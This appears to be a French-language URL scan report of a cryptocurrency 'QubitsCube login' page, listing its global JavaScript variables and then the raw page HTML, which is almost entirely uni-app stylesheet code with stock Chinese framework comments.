https://www.qubitscube.tech/

ID de l'analyse :
0b8d8e10-d0c2-4e7d-8c2b-3ba0c7a401b3Terminée
URL soumise :
https://www.qubitscube.tech/
Fin du rapport :

Liens : 0 trouvé(s)

Liens sortants identifiés à partir de la page

Variables JavaScript : 5 trouvée(s)

Les variables JavaScript globales chargées dans l'objet fenêtre d'une page sont des variables déclarées en dehors des fonctions et accessibles depuis n'importe quel endroit du code au sein du champ d'application actuel

NomType
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
$function
jQueryfunction

Messages de journal de console : 0 trouvé(s)

Messages consignés dans la console web

HTML

Le corps HTML de la page en données brutes

<!DOCTYPE html><html lang="en" style="--status-bar-height: 0px; --top-window-height: 0px; --window-left: 0px; --window-right: 0px; --window-margin: 0px; --window-top: calc(var(--top-window-height) + 0px); --window-bottom: 0px;"><head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>QubitsCube login</title>
    <meta content="With the rapid growth of the digital currencymarket, global investors have an increasingdemand for innovative and diversified" name="description">
    <meta content="QubitsCube login" property="og:site_name">
    <meta content="QubitsCube login" property="og:title">
    <meta content="With the rapid growth of the digital currencymarket, global investors have an increasingdemand for innovative and diversified" property="og:description">
    <meta content="QubitsCube login" name="twitter:title">
    <meta content="With the rapid growth of the digital currencymarket, global investors have an increasingdemand for innovative and diversified" name="twitter:description">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, viewport-fit=cover">
    <link rel="shortcut icon" href="./img/favicon.ico" type="image/x-icon">
    <link rel="shortcut icon" href="./img/favicon.ico">
    <link rel="stylesheet" href="./css/index.2da1efab.css">
    <style type="text/css">@charset "UTF-8";
    /**
     * 这里是uni-app内置的常用样式变量
     *
     * uni-app 官方扩展插件及插件市场(https://ext.dcloud.net.cn)上很多三方插件均使用了这些样式变量
     * 如果你是插件开发者,建议你使用scss预处理,并在插件代码中直接使用这些变量(无需 import 这个文件),方便用户通过搭积木的方式开发整体风格一致的App
     *
     */
    /**
     * 如果你是App开发者(插件使用者),你可以通过修改这些变量来定制自己的插件主题,实现自定义主题功能
     *
     * 如果你的项目同样使用了scss预处理,你也可以直接在你的 scss 代码中使用如下变量,同时无需 import 这个文件
     */
    /* 颜色变量 */
    /* 行为相关颜色 */
    /* 文字基本颜色 */
    /* 背景颜色 */
    /* 边框颜色 */
    /* 尺寸变量 */
    /* 文字尺寸 */
    /* 图片尺寸 */
    /* Border Radius */
    /* 水平间距 */
    /* 垂直间距 */
    /* 透明度 */
    /* 文章场景相关 */
    .Headlines-Bold1 {
        color: #212121;
        /* Headlines/Header 1 */
        font-family: Zen Kaku Gothic Antique;
        font-size: 40px;
        font-style: normal;
        font-weight: 700;
        line-height: 52px
        /* 130% */
    }

    .Headlines-Bold2 {
        color: var(--neutral-coal-black, #1a1b31);
        /* Headlines/Header 2 */
        font-family: Zen Kaku Gothic Antique;
        font-size: 28px;
        font-style: normal;
        font-weight: 700;
        line-height: normal
    }

    .Headlines-Bold3 {
        color: var(--neutral-coal-black, #1a1b31);
        /* Headlines/Header 3 */
        font-family: Zen Kaku Gothic Antique;
        font-size: 18px;
        font-style: normal;
        font-weight: 700;
        line-height: normal
    }

    .Headlines-Bold4 {
        color: var(--neutral-coal-black, #1a1b31);
        text-align: center;
        /* Headlines/Header 4 */
        font-family: Zen Kaku Gothic Antique;
        font-size: 16px;
        font-style: normal;
        font-weight: 700;
        line-height: normal
    }

    .button1 {
        display: flex;
        width: 327px;
        height: 56px;
        padding: 16px 124px;
        justify-content: center;
        align-items: center;
        gap: 10px;
        flex-shrink: 0;
        border-radius: 49px;
        background: linear-gradient(117deg, #ffd03e 20.87%, #e9b020 110.8%)
    }

    .button2 {
        display: flex;
        width: 327px;
        height: 56px;
        padding: 16px 124px;
        justify-content: center;
        align-items: center;
        gap: 10px;
        flex-shrink: 0;
        border-radius: 49px;
        background: #ffd03e
    }

    .button3 {
        display: flex;
        width: 156px;
        height: 48px;
        padding: 12px 63px;
        justify-content: center;
        align-items: center;
        gap: 10px;
        flex-shrink: 0;
        border-radius: 28px;
        border: 2px dashed #ffd03e
    }

    .button4 {
        display: flex;
        width: 120px;
        height: 36px;
        padding: 7px 18px;
        justify-content: center;
        align-items: center;
        gap: 10px;
        flex-shrink: 0;
        border-radius: 6px;
        background: #ffd03e
    }

    .button5 {
        display: flex;
        width: 120px;
        height: 36px;
        padding: 7px 9px;
        justify-content: center;
        align-items: center;
        gap: 10px;
        flex-shrink: 0;
        border-radius: 6px;
        background: #d9dce0
    }

    .input-title {
        color: var(--black, #000);
        font-family: Lufga;
        font-size: 14px;
        font-style: normal;
        font-weight: 700;
        line-height: normal;
        margin-bottom: 8px;
        display: flex;
        justify-content: space-between
    }

    .login-type {
        color: #ffd03e;
        border-bottom: 1px #ffd03e solid
    }

    .input-font {
        color: var(--neutral-gray-4, #b6b6b6);
        font-family: Zen Kaku Gothic Antique;
        font-size: 16px;
        font-style: normal;
        font-weight: 400;
        line-height: normal
    }

    .title-gray {
        color: var(--neutral-gray-4, #b6b6b6);
        font-family: Zen Kaku Gothic Antique;
        font-size: 20px;
        font-style: normal;
        font-weight: 500;
        line-height: normal
    }

    .top-bar {
        padding-top: 20px
    }

    .top-bar .title-page {
        color: var(--black, #000);
        font-family: Lufga;
        font-size: 20px;
        font-style: normal;
        font-weight: 700;
        line-height: normal;
        letter-spacing: -.4px
    }

    /*每个页面公共css */
    @font-face {
        font-family: Lufga;
        src: url(/static/fonts/LufgaRegular.ttf) format("truetype")
    }

    @font-face {
        font-family: LufgaBold;
        src: url(/static/fonts/LufgaBold.ttf) format("truetype")
    }

    uni-page-body {
        background-color: #fff
    }

    body {
        background-color: #fff
    }

    .uni-body {
        max-width: 414px;
        margin: auto !important
    }

    .uni-tabbar .uni-tabbar__reddot {
        position: absolute !important;
        top: 10px !important
    }

    .uni-tabbar {
        max-width: 414px;
        bottom: 0;
        left: 0;
        right: 0;
        margin-left: auto !important;
        margin-right: auto !important
    }

    .uni-page-head {
        max-width: 414px;
        margin: auto !important
    }

    ::-webkit-scrollbar {
        width: 5px;
        /* 控制滚动条的宽度 */
        height: 5px
    }

    /* 滚动条轨道样式 */
    ::-webkit-scrollbar-track {
        background: #f1f1f1;
        /* 轨道的背景颜色 */
        border-radius: 10px
        /* 轨道的圆角 */
    }

    /* 滚动条滑块样式 */
    ::-webkit-scrollbar-thumb {
        background: #888;
        /* 滑块的背景颜色 */
        border-radius: 10px
        /* 滑块的圆角 */
    }

    /* 当鼠标悬停在滑块上时的样式 */
    ::-webkit-scrollbar-thumb:hover {
        background: #555
        /* 悬停时滑块的背景颜色 */
    }</style>
    <style type="text/css">.uni-app--showtabbar uni-page-wrapper {
        display: block;
        height: calc(100% - 65px);
        height: calc(100% - 65px - constant(safe-area-inset-bottom));
        height: calc(100% - 65px - env(safe-area-inset-bottom));
    }
    .uni-app--showtabbar uni-page-wrapper::after {
        content: "";
        display: block;
        width: 100%;
        height: 65px;
        height: calc(65px + constant(safe-area-inset-bottom));
        height: calc(65px + env(safe-area-inset-bottom));
    }
    .uni-app--showtabbar uni-page-head[uni-page-head-type="default"] ~ uni-page-wrapper {
        height: calc(100% - 44px - 65px);
        height: calc(100% - 44px - constant(safe-area-inset-top) - 65px - constant(safe-area-inset-bottom));
        height: calc(100% - 44px - env(safe-area-inset-top) - 65px - env(safe-area-inset-bottom));
    }</style>
    <style id="ss-chat-custom-css">.ss-chat-body {
        overflow: hidden !important
    }</style>
    <style type="text/css">@charset "UTF-8";
    /**
     * 这里是uni-app内置的常用样式变量
     *
     * uni-app 官方扩展插件及插件市场(https://ext.dcloud.net.cn)上很多三方插件均使用了这些样式变量
     * 如果你是插件开发者,建议你使用scss预处理,并在插件代码中直接使用这些变量(无需 import 这个文件),方便用户通过搭积木的方式开发整体风格一致的App
     *
     */
    /**
     * 如果你是App开发者(插件使用者),你可以通过修改这些变量来定制自己的插件主题,实现自定义主题功能
     *
     * 如果你的项目同样使用了scss预处理,你也可以直接在你的 scss 代码中使用如下变量,同时无需 import 这个文件
     */
    /* 颜色变量 */
    /* 行为相关颜色 */
    /* 文字基本颜色 */
    /* 背景颜色 */
    /* 边框颜色 */
    /* 尺寸变量 */
    /* 文字尺寸 */
    /* 图片尺寸 */
    /* Border Radius */
    /* 水平间距 */
    /* 垂直间距 */
    /* 透明度 */
    /* 文章场景相关 */
    .uniui-color[data-v-0a75b799]:before {
        content: "\e6cf"
    }

    .uniui-wallet[data-v-0a75b799]:before {
        content: "\e6b1"
    }

    .uniui-settings-filled[data-v-0a75b799]:before {
        content: "\e6ce"
    }

    .uniui-auth-filled[data-v-0a75b799]:before {
        content: "\e6cc"
    }

    .uniui-shop-filled[data-v-0a75b799]:before {
        content: "\e6cd"
    }

    .uniui-staff-filled[data-v-0a75b799]:before {
        content: "\e6cb"
    }

    .uniui-vip-filled[data-v-0a75b799]:before {
        content: "\e6c6"
    }

    .uniui-plus-filled[data-v-0a75b799]:before {
        content: "\e6c7"
    }

    .uniui-folder-add-filled[data-v-0a75b799]:before {
        content: "\e6c8"
    }

    .uniui-color-filled[data-v-0a75b799]:before {
        content: "\e6c9"
    }

    .uniui-tune-filled[data-v-0a75b799]:before {
        content: "\e6ca"
    }

    .uniui-calendar-filled[data-v-0a75b799]:before {
        content: "\e6c0"
    }

    .uniui-notification-filled[data-v-0a75b799]:before {
        content: "\e6c1"
    }

    .uniui-wallet-filled[data-v-0a75b799]:before {
        content: "\e6c2"
    }

    .uniui-medal-filled[data-v-0a75b799]:before {
        content: "\e6c3"
    }

    .uniui-gift-filled[data-v-0a75b799]:before {
        content: "\e6c4"
    }

    .uniui-fire-filled[data-v-0a75b799]:before {
        content: "\e6c5"
    }

    .uniui-refreshempty[data-v-0a75b799]:before {
        content: "\e6bf"
    }

    .uniui-location-filled[data-v-0a75b799]:before {
        content: "\e6af"
    }

    .uniui-person-filled[data-v-0a75b799]:before {
        content: "\e69d"
    }

    .uniui-personadd-filled[data-v-0a75b799]:before {
        content: "\e698"
    }

    .uniui-back[data-v-0a75b799]:before {
        content: "\e6b9"
    }

    .uniui-forward[data-v-0a75b799]:before {
        content: "\e6ba"
    }

    .uniui-arrow-right[data-v-0a75b799]:before {
        content: "\e6bb"
    }

    .uniui-arrowthinright[data-v-0a75b799]:before {
        content: "\e6bb"
    }

    .uniui-arrow-left[data-v-0a75b799]:before {
        content: "\e6bc"
    }

    .uniui-arrowthinleft[data-v-0a75b799]:before {
        content: "\e6bc"
    }

    .uniui-arrow-up[data-v-0a75b799]:before {
        content: "\e6bd"
    }

    .uniui-arrowthinup[data-v-0a75b799]:before {
        content: "\e6bd"
    }

    .uniui-arrow-down[data-v-0a75b799]:before {
        content: "\e6be"
    }

    .uniui-arrowthindown[data-v-0a75b799]:before {
        content: "\e6be"
    }

    .uniui-bottom[data-v-0a75b799]:before {
        content: "\e6b8"
    }

    .uniui-arrowdown[data-v-0a75b799]:before {
        content: "\e6b8"
    }

    .uniui-right[data-v-0a75b799]:before {
        content: "\e6b5"
    }

    .uniui-arrowright[data-v-0a75b799]:before {
        content: "\e6b5"
    }

    .uniui-top[data-v-0a75b799]:before {
        content: "\e6b6"
    }

    .uniui-arrowup[data-v-0a75b799]:before {
        content: "\e6b6"
    }

    .uniui-left[data-v-0a75b799]:before {
        content: "\e6b7"
    }

    .uniui-arrowleft[data-v-0a75b799]:before {
        content: "\e6b7"
    }

    .uniui-eye[data-v-0a75b799]:before {
        content: "\e651"
    }

    .uniui-eye-filled[data-v-0a75b799]:before {
        content: "\e66a"
    }

    .uniui-eye-slash[data-v-0a75b799]:before {
        content: "\e6b3"
    }

    .uniui-eye-slash-filled[data-v-0a75b799]:before {
        content: "\e6b4"
    }

    .uniui-info-filled[data-v-0a75b799]:before {
        content: "\e649"
    }

    .uniui-reload[data-v-0a75b799]:before {
        content: "\e6b2"
    }

    .uniui-micoff-filled[data-v-0a75b799]:before {
        content: "\e6b0"
    }

    .uniui-map-pin-ellipse[data-v-0a75b799]:before {
        content: "\e6ac"
    }

    .uniui-map-pin[data-v-0a75b799]:before {
        content: "\e6ad"
    }

    .uniui-location[data-v-0a75b799]:before {
        content: "\e6ae"
    }

    .uniui-starhalf[data-v-0a75b799]:before {
        content: "\e683"
    }

    .uniui-star[data-v-0a75b799]:before {
        content: "\e688"
    }

    .uniui-star-filled[data-v-0a75b799]:before {
        content: "\e68f"
    }

    .uniui-calendar[data-v-0a75b799]:before {
        content: "\e6a0"
    }

    .uniui-fire[data-v-0a75b799]:before {
        content: "\e6a1"
    }

    .uniui-medal[data-v-0a75b799]:before {
        content: "\e6a2"
    }

    .uniui-font[data-v-0a75b799]:before {
        content: "\e6a3"
    }

    .uniui-gift[data-v-0a75b799]:before {
        content: "\e6a4"
    }

    .uniui-link[data-v-0a75b799]:before {
        content: "\e6a5"
    }

    .uniui-notification[data-v-0a75b799]:before {
        content: "\e6a6"
    }

    .uniui-staff[data-v-0a75b799]:before {
        content: "\e6a7"
    }

    .uniui-vip[data-v-0a75b799]:before {
        content: "\e6a8"
    }

    .uniui-folder-add[data-v-0a75b799]:before {
        content: "\e6a9"
    }

    .uniui-tune[data-v-0a75b799]:before {
        content: "\e6aa"
    }

    .uniui-auth[data-v-0a75b799]:before {
        content: "\e6ab"
    }

    .uniui-person[data-v-0a75b799]:before {
        content: "\e699"
    }

    .uniui-email-filled[data-v-0a75b799]:before {
        content: "\e69a"
    }

    .uniui-phone-filled[data-v-0a75b799]:before {
        content: "\e69b"
    }

    .uniui-phone[data-v-0a75b799]:before {
        content: "\e69c"
    }

    .uniui-email[data-v-0a75b799]:before {
        content: "\e69e"
    }

    .uniui-personadd[data-v-0a75b799]:before {
        content: "\e69f"
    }

    .uniui-chatboxes-filled[data-v-0a75b799]:before {
        content: "\e692"
    }

    .uniui-contact[data-v-0a75b799]:before {
        content: "\e693"
    }

    .uniui-chatbubble-filled[data-v-0a75b799]:before {
        content: "\e694"
    }

    .uniui-contact-filled[data-v-0a75b799]:before {
        content: "\e695"
    }

    .uniui-chatboxes[data-v-0a75b799]:before {
        content: "\e696"
    }

    .uniui-chatbubble[data-v-0a75b799]:before {
        content: "\e697"
    }

    .uniui-upload-filled[data-v-0a75b799]:before {
        content: "\e68e"
    }

    .uniui-upload[data-v-0a75b799]:before {
        content: "\e690"
    }

    .uniui-weixin[data-v-0a75b799]:before {
        content: "\e691"
    }

    .uniui-compose[data-v-0a75b799]:before {
        content: "\e67f"
    }

    .uniui-qq[data-v-0a75b799]:before {
        content: "\e680"
    }

    .uniui-download-filled[data-v-0a75b799]:before {
        content: "\e681"
    }

    .uniui-pyq[data-v-0a75b799]:before {
        content: "\e682"
    }

    .uniui-sound[data-v-0a75b799]:before {
        content: "\e684"
    }

    .uniui-trash-filled[data-v-0a75b799]:before {
        content: "\e685"
    }

    .uniui-sound-filled[data-v-0a75b799]:before {
        content: "\e686"
    }

    .uniui-trash[data-v-0a75b799]:before {
        content: "\e687"
    }

    .uniui-videocam-filled[data-v-0a75b799]:before {
        content: "\e689"
    }

    .uniui-spinner-cycle[data-v-0a75b799]:before {
        content: "\e68a"
    }

    .uniui-weibo[data-v-0a75b799]:before {
        content: "\e68b"
    }

    .uniui-videocam[data-v-0a75b799]:before {
        content: "\e68c"
    }

    .uniui-download[data-v-0a75b799]:before {
        content: "\e68d"
    }

    .uniui-help[data-v-0a75b799]:before {
        content: "\e679"
    }

    .uniui-navigate-filled[data-v-0a75b799]:before {
        content: "\e67a"
    }

    .uniui-plusempty[data-v-0a75b799]:before {
        content: "\e67b"
    }

    .uniui-smallcircle[data-v-0a75b799]:before {
        content: "\e67c"
    }

    .uniui-minus-filled[data-v-0a75b799]:before {
        content: "\e67d"
    }

    .uniui-micoff[data-v-0a75b799]:before {
        content: "\e67e"
    }

    .uniui-closeempty[data-v-0a75b799]:before {
        content: "\e66c"
    }

    .uniui-clear[data-v-0a75b799]:before {
        content: "\e66d"
    }

    .uniui-navigate[data-v-0a75b799]:before {
        content: "\e66e"
    }

    .uniui-minus[data-v-0a75b799]:before {
        content: "\e66f"
    }

    .uniui-image[data-v-0a75b799]:before {
        content: "\e670"
    }

    .uniui-mic[data-v-0a75b799]:before {
        content: "\e671"
    }

    .uniui-paperplane[data-v-0a75b799]:before {
        content: "\e672"
    }

    .uniui-close[data-v-0a75b799]:before {
        content: "\e673"
    }

    .uniui-help-filled[data-v-0a75b799]:before {
        content: "\e674"
    }

    .uniui-paperplane-filled[data-v-0a75b799]:before {
        content: "\e675"
    }

    .uniui-plus[data-v-0a75b799]:before {
        content: "\e676"
    }

    .uniui-mic-filled[data-v-0a75b799]:before {
        content: "\e677"
    }

    .uniui-image-filled[data-v-0a75b799]:before {
        content: "\e678"
    }

    .uniui-locked-filled[data-v-0a75b799]:before {
        content: "\e668"
    }

    .uniui-info[data-v-0a75b799]:before {
        content: "\e669"
    }

    .uniui-locked[data-v-0a75b799]:before {
        content: "\e66b"
    }

    .uniui-camera-filled[data-v-0a75b799]:before {
        content: "\e658"
    }

    .uniui-chat-filled[data-v-0a75b799]:before {
        content: "\e659"
    }

    .uniui-camera[data-v-0a75b799]:before {
        content: "\e65a"
    }

    .uniui-circle[data-v-0a75b799]:before {
        content: "\e65b"
    }

    .uniui-checkmarkempty[data-v-0a75b799]:before {
        content: "\e65c"
    }

    .uniui-chat[data-v-0a75b799]:before {
        content: "\e65d"
    }

    .uniui-circle-filled[data-v-0a75b799]:before {
        content: "\e65e"
    }

    .uniui-flag[data-v-0a75b799]:before {
        content: "\e65f"
    }

    .uniui-flag-filled[data-v-0a75b799]:before {
        content: "\e660"
    }

    .uniui-gear-filled[data-v-0a75b799]:before {
        content: "\e661"
    }

    .uniui-home[data-v-0a75b799]:before {
        content: "\e662"
    }

    .uniui-home-filled[data-v-0a75b799]:before {
        content: "\e663"
    }

    .uniui-gear[data-v-0a75b799]:before {
        content: "\e664"
    }

    .uniui-smallcircle-filled[data-v-0a75b799]:before {
        content: "\e665"
    }

    .uniui-map-filled[data-v-0a75b799]:before {
        content: "\e666"
    }

    .uniui-map[data-v-0a75b799]:before {
        content: "\e667"
    }

    .uniui-refresh-filled[data-v-0a75b799]:before {
        content: "\e656"
    }

    .uniui-refresh[data-v-0a75b799]:before {
        content: "\e657"
    }

    .uniui-cloud-upload[data-v-0a75b799]:before {
        content: "\e645"
    }

    .uniui-cloud-download-filled[data-v-0a75b799]:before {
        content: "\e646"
    }

    .uniui-cloud-download[data-v-0a75b799]:before {
        content: "\e647"
    }

    .uniui-cloud-upload-filled[data-v-0a75b799]:before {
        content: "\e648"
    }

    .uniui-redo[data-v-0a75b799]:before {
        content: "\e64a"
    }

    .uniui-images-filled[data-v-0a75b799]:before {
        content: "\e64b"
    }

    .uniui-undo-filled[data-v-0a75b799]:before {
        content: "\e64c"
    }

    .uniui-more[data-v-0a75b799]:before {
        content: "\e64d"
    }

    .uniui-more-filled[data-v-0a75b799]:before {
        content: "\e64e"
    }

    .uniui-undo[data-v-0a75b799]:before {
        content: "\e64f"
    }

    .uniui-images[data-v-0a75b799]:before {
        content: "\e650"
    }

    .uniui-paperclip[data-v-0a75b799]:before {
        content: "\e652"
    }

    .uniui-settings[data-v-0a75b799]:before {
        content: "\e653"
    }

    .uniui-search[data-v-0a75b799]:before {
        content: "\e654"
    }

    .uniui-redo-filled[data-v-0a75b799]:before {
        content: "\e655"
    }

    .uniui-list[data-v-0a75b799]:before {
        content: "\e644"
    }

    .uniui-mail-open-filled[data-v-0a75b799]:before {
        content: "\e63a"
    }

    .uniui-hand-down-filled[data-v-0a75b799]:before {
        content: "\e63c"
    }

    .uniui-hand-down[data-v-0a75b799]:before {
        content: "\e63d"
    }

    .uniui-hand-up-filled[data-v-0a75b799]:before {
        content: "\e63e"
    }

    .uniui-hand-up[data-v-0a75b799]:before {
        content: "\e63f"
    }

    .uniui-heart-filled[data-v-0a75b799]:before {
        content: "\e641"
    }

    .uniui-mail-open[data-v-0a75b799]:before {
        content: "\e643"
    }

    .uniui-heart[data-v-0a75b799]:before {
        content: "\e639"
    }

    .uniui-loop[data-v-0a75b799]:before {
        content: "\e633"
    }

    .uniui-pulldown[data-v-0a75b799]:before {
        content: "\e632"
    }

    .uniui-scan[data-v-0a75b799]:before {
        content: "\e62a"
    }

    .uniui-bars[data-v-0a75b799]:before {
        content: "\e627"
    }

    .uniui-cart-filled[data-v-0a75b799]:before {
        content: "\e629"
    }

    .uniui-checkbox[data-v-0a75b799]:before {
        content: "\e62b"
    }

    .uniui-checkbox-filled[data-v-0a75b799]:before {
        content: "\e62c"
    }

    .uniui-shop[data-v-0a75b799]:before {
        content: "\e62f"
    }

    .uniui-headphones[data-v-0a75b799]:before {
        content: "\e630"
    }

    .uniui-cart[data-v-0a75b799]:before {
        content: "\e631"
    }

    .Headlines-Bold1[data-v-0a75b799] {
        color: #212121;
        /* Headlines/Header 1 */
        font-family: Zen Kaku Gothic Antique;
        font-size: 40px;
        font-style: normal;
        font-weight: 700;
        line-height: 52px
        /* 130% */
    }

    .Headlines-Bold2[data-v-0a75b799] {
        color: var(--neutral-coal-black, #1a1b31);
        /* Headlines/Header 2 */
        font-family: Zen Kaku Gothic Antique;
        font-size: 28px;
        font-style: normal;
        font-weight: 700;
        line-height: normal
    }

    .Headlines-Bold3[data-v-0a75b799] {
        color: var(--neutral-coal-black, #1a1b31);
        /* Headlines/Header 3 */
        font-family: Zen Kaku Gothic Antique;
        font-size: 18px;
        font-style: normal;
        font-weight: 700;
        line-height: normal
    }

    .Headlines-Bold4[data-v-0a75b799] {
        color: var(--neutral-coal-black, #1a1b31);
        text-align: center;
        /* Headlines/Header 4 */
        font-family: Zen Kaku Gothic Antique;
        font-size: 16px;
        font-style: normal;
        font-weight: 700;
        line-height: normal
    }

    .button1[data-v-0a75b799] {
        display: flex;
        width: 327px;
        height: 56px;
        padding: 16px 124px;
        justify-content: center;
        align-items: center;
        gap: 10px;
        flex-shrink: 0;
        border-radius: 49px;
        background: linear-gradient(117deg, #ffd03e 20.87%, #e9b020 110.8%)
    }

    .button2[data-v-0a75b799] {
        display: flex;
        width: 327px;
        height: 56px;
        padding: 16px 124px;
        justify-content: center;
        align-items: center;
        gap: 10px;
        flex-shrink: 0;
        border-radius: 49px;
        background: #ffd03e
    }

    .button3[data-v-0a75b799] {
        display: flex;
        width: 156px;
        height: 48px;
        padding: 12px 63px;
        justify-content: center;
        align-items: center;
        gap: 10px;
        flex-shrink: 0;
        border-radius: 28px;
        border: 2px dashed #ffd03e
    }

    .button4[data-v-0a75b799] {
        display: flex;
        width: 120px;
        height: 36px;
        padding: 7px 18px;
        justify-content: center;
        align-items: center;
        gap: 10px;
        flex-shrink: 0;
        border-radius: 6px;
        background: #ffd03e
    }

    .button5[data-v-0a75b799] {
        display: flex;
        width: 120px;
        height: 36px;
        padding: 7px 9px;
        justify-content: center;
        align-items: center;
        gap: 10px;
        flex-shrink: 0;
        border-radius: 6px;
        background: #d9dce0
    }

    .input-title[data-v-0a75b799] {
        color: var(--black, #000);
        font-family: Lufga;
        font-size: 14px;
        font-style: normal;
        font-weight: 700;
        line-height: normal;
        margin-bottom: 8px;
        display: flex;
        justify-content: space-between
    }

    .login-type[data-v-0a75b799] {
        color: #ffd03e;
        border-bottom: 1px #ffd03e solid
    }

    .input-font[data-v-0a75b799] {
        color: var(--neutral-gray-4, #b6b6b6);
        font-family: Zen Kaku Gothic Antique;
        font-size: 16px;
        font-style: normal;
        font-weight: 400;
        line-height: normal
    }

    .title-gray[data-v-0a75b799] {
        color: var(--neutral-gray-4, #b6b6b6);
        font-family: Zen Kaku Gothic Antique;
        font-size: 20px;
        font-style: normal;
        font-weight: 500;
        line-height: normal
    }

    .top-bar[data-v-0a75b799] {
        padding-top: 20px
    }

    .top-bar .title-page[data-v-0a75b799] {
        color: var(--black, #000);
        font-family: Lufga;
        font-size: 20px;
        font-style: normal;
        font-weight: 700;
        line-height: normal;
        letter-spacing: -.4px
    }

    @font-face {
        font-family: uniicons;
        src: url(./assets/uniicons.b6d3756e.ttf) format("truetype")
    }

    .uni-icons[data-v-0a75b799] {
        font-family: uniicons;
        text-decoration: none;
        text-align: center
    }</style>
    <style type="text/css">@charset "UTF-8";
    /**
     * 这里是uni-app内置的常用样式变量
     *
     * uni-app 官方扩展插件及插件市场(https://ext.dcloud.net.cn)上很多三方插件均使用了这些样式变量
     * 如果你是插件开发者,建议你使用scss预处理,并在插件代码中直接使用这些变量(无需 import 这个文件),方便用户通过搭积木的方式开发整体风格一致的App
     *
     */
    /**
     * 如果你是App开发者(插件使用者),你可以通过修改这些变量来定制自己的插件主题,实现自定义主题功能
     *
     * 如果你的项目同样使用了scss预处理,你也可以直接在你的 scss 代码中使用如下变量,同时无需 import 这个文件
     */
    /* 颜色变量 */
    /* 行为相关颜色 */
    /* 文字基本颜色 */
    /* 背景颜色 */
    /* 边框颜色 */
    /* 尺寸变量 */
    /* 文字尺寸 */
    /* 图片尺寸 */
    /* Border Radius */
    /* 水平间距 */
    /* 垂直间距 */
    /* 透明度 */
    /* 文章场景相关 */
    .Headlines-Bold1[data-v-6010a3b0] {
        color: #212121;
        /* Headlines/Header 1 */
        font-family: Zen Kaku Gothic Antique;
        font-size: 40px;
        font-style: normal;
        font-weight: 700;
        line-height: 52px
        /* 130% */
    }

    .Headlines-Bold2[data-v-6010a3b0] {
        color: var(--neutral-coal-black, #1a1b31);
        /* Headlines/Header 2 */
        font-family: Zen Kaku Gothic Antique;
        font-size: 28px;
        font-style: normal;
        font-weight: 700;
        line-height: normal
    }

    .Headlines-Bold3[data-v-6010a3b0] {
        color: var(--neutral-coal-black, #1a1b31);
        /* Headlines/Header 3 */
        font-family: Zen Kaku Gothic Antique;
        font-size: 18px;
        font-style: normal;
        font-weight: 700;
        line-height: normal
    }

    .Headlines-Bold4[data-v-6010a3b0] {
        color: var(--neutral-coal-black, #1a1b31);
        text-align: center;
        /* Headlines/Header 4 */
        font-family: Zen Kaku Gothic Antique;
        font-size: 16px;
        font-style: normal;
        font-weight: 700;
        line-height: normal
    }

    .button1[data-v-6010a3b0] {
        display: flex;
        width: 327px;
        height: 56px;
        padding: 16px 124px;
        justify-content: center;
        align-items: center;
        gap: 10px;
        flex-shrink: 0;
        border-radius: 49px;
        background: linear-gradient(117deg, #ffd03e 20.87%, #e9b020 110.8%)
    }

    .button2[data-v-6010a3b0] {
        display: flex;
        width: 327px;
        height: 56px;
        padding: 16px 124px;
        justify-content: center;
        align-items: center;
        gap: 10px;
        flex-shrink: 0;
        border-radius: 49px;
        background: #ffd03e
    }

    .button3[data-v-6010a3b0] {
        display: flex;
        width: 156px;
        height: 48px;
        padding: 12px 63px;
        justify-content: center;
        align-items: center;
        gap: 10px;
        flex-shrink: 0;
        border-radius: 28px;
        border: 2px dashed #ffd03e
    }

    .button4[data-v-6010a3b0] {
        display: flex;
        width: 120px;
        height: 36px;
        padding: 7px 18px;
        justify-content: center;
        align-items: center;
        gap: 10px;
        flex-shrink: 0;
        border-radius: 6px;
        background: #ffd03e
    }

    .button5[data-v-6010a3b0] {
        display: flex;
        width: 120px;
        height: 36px;
        padding: 7px 9px;
        justify-content: center;
        align-items: center;
        gap: 10px;
        flex-shrink: 0;
        border-radius: 6px;
        background: #d9dce0
    }

    .input-title[data-v-6010a3b0] {
        color: var(--black, #000);
        font-family: Lufga;
        font-size: 14px;
        font-style: normal;
        font-weight: 700;
        line-height: normal;
        margin-bottom: 8px;
        display: flex;
        justify-content: space-between
    }

    .login-type[data-v-6010a3b0] {
        color: #ffd03e;
        border-bottom: 1px #ffd03e solid
    }

    .input-font[data-v-6010a3b0] {
        color: var(--neutral-gray-4, #b6b6b6);
        font-family: Zen Kaku Gothic Antique;
        font-size: 16px;
        font-style: normal;
        font-weight: 400;
        line-height: normal
    }

    .title-gray[data-v-6010a3b0] {
        color: var(--neutral-gray-4, #b6b6b6);
        font-family: Zen Kaku Gothic Antique;
        font-size: 20px;
        font-style: normal;
        font-weight: 500;
        line-height: normal
    }

    .top-bar[data-v-6010a3b0] {
        padding-top: 20px
    }

    .top-bar .title-page[data-v-6010a3b0] {
        color: var(--black, #000);
        font-family: Lufga;
        font-size: 20px;
        font-style: normal;
        font-weight: 700;
        line-height: normal;
        letter-spacing: -.4px
    }

    .uni-easyinput[data-v-6010a3b0] {
        width: 100%;
        flex: 1;
        position: relative;
        text-align: left;
        color: #333;
        font-size: 14px
    }

    .uni-easyinput__content[data-v-6010a3b0] {
        flex: 1;
        width: 100%;
        display: flex;
        box-sizing: border-box;
        flex-direction: row;
        align-items: center;
        border-color: #fff;
        transition-property: border-color;
        transition-duration: .3s
    }

    .uni-easyinput__content-input[data-v-6010a3b0] {
        width: auto;
        position: relative;
        overflow: hidden;
        flex: 1;
        line-height: 1;
        font-size: 14px;
        height: 46px
    }

    .uni-easyinput__placeholder-class[data-v-6010a3b0] {
        color: #999;
        font-size: 14px
    }

    .is-textarea[data-v-6010a3b0] {
        align-items: flex-start
    }

    .is-textarea-icon[data-v-6010a3b0] {
        margin-top: 5px
    }

    .uni-easyinput__content-textarea[data-v-6010a3b0] {
        position: relative;
        overflow: hidden;
        flex: 1;
        line-height: 1.5;
        font-size: 14px;
        margin: 6px;
        margin-left: 0;
        height: 80px;
        min-height: 80px;
        min-height: 80px;
        width: auto
    }

    .input-padding[data-v-6010a3b0] {
        padding-left: 10px
    }

    .content-clear-icon[data-v-6010a3b0] {
        padding: 0 5px;
        margin-left: 8px
    }

    .label-icon[data-v-6010a3b0] {
        margin-right: 5px;
        margin-top: -1px
    }

    .is-input-border[data-v-6010a3b0] {
        display: flex;
        box-sizing: border-box;
        flex-direction: row;
